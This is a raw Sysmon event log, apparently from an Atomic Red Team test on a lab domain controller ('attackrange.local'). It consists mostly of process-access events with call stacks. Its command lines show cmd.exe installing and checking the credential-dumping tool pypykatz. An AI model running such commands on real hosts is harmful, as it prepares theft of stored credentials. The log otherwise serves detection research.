21:10:05.217{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A32D-60D3-4506-00000000CF01}5036C:\Windows\system32\cmd.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c01f5|UNKNOWN(00007FFF5B97FD63) 10341000x800000000000000025239Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:05.217{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025238Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.217{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025237Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:05.217{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025236Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.217{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025235Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:05.217{4DB9351A-9E1D-60D3-8B00-00000000CF01}47084724C:\Windows\system32\csrss.exe{4DB9351A-A32D-60D3-4506-00000000CF01}5036C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000025234Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.217{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A32D-60D3-4506-00000000CF01}5036C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa995(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa7fc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bf3392d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.
dll+9bea2a82(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982034(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9becba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bead93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be9e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bedacff(wow64) 154100x800000000000000025233Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:05.224{4DB9351A-A32D-60D3-4506-00000000CF01}5036C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c "pip install pypykatz" C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x800000000000000025232Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.217{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-err.txt2021-06-23 21:09:49.615 23542300x800000000000000025231Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.217{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-err.txtMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000025230Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.217{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-out.txt2021-06-23 21:09:49.615 23542300x800000000000000025229Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:05.217{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-out.txtMD5=1EA5228DE07F9958C170DAE50D9ED309,SHA256=8B92F2810F9B02ED176CB745DFE5956E5105FE8A0E76792782E8A11085D0C198,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000025228Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.217{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=941FB1F4AB649507B10DEF5E739C473F,SHA256=9C2E99348B3826AFD08CAA45972C4BDB51430BBB4084F97A821E9645AF708F81,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000025227Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.202{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A32D-60D3-4406-00000000CF01}4036C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025226Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:05.186{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A32D-60D3-4406-00000000CF01}4036C:\Windows\system32\cmd.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c01f5|UNKNOWN(00007FFF5B97FD63) 10341000x800000000000000025225Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.186{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025224Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:05.186{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025223Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.186{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025222Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:05.186{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025221Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.186{4DB9351A-9E1D-60D3-8B00-00000000CF01}47084724C:\Windows\system32\csrss.exe{4DB9351A-A32D-60D3-4406-00000000CF01}4036C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000025220Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:05.186{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A32D-60D3-4406-00000000CF01}4036C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa995(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa7fc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bf3392d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bea2a82(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982034(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078
deb11475889\System.Management.Automation.ni.dll+9becba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bead93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be9e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bedacff(wow64) 154100x800000000000000025219Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.197{4DB9351A-A32D-60D3-4406-00000000CF01}4036C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c "pypykatz -h >nul 2>&1 && exit /b %%errorlevel%%" 
C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 10341000x800000000000000025218Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.123{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A32D-60D3-4306-00000000CF01}6100C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025217Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.123{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A32D-60D3-4306-00000000CF01}6100C:\Windows\system32\cmd.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c01f5|UNKNOWN(00007FFF5B97FD63) 10341000x800000000000000025216Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:05.123{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025215Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 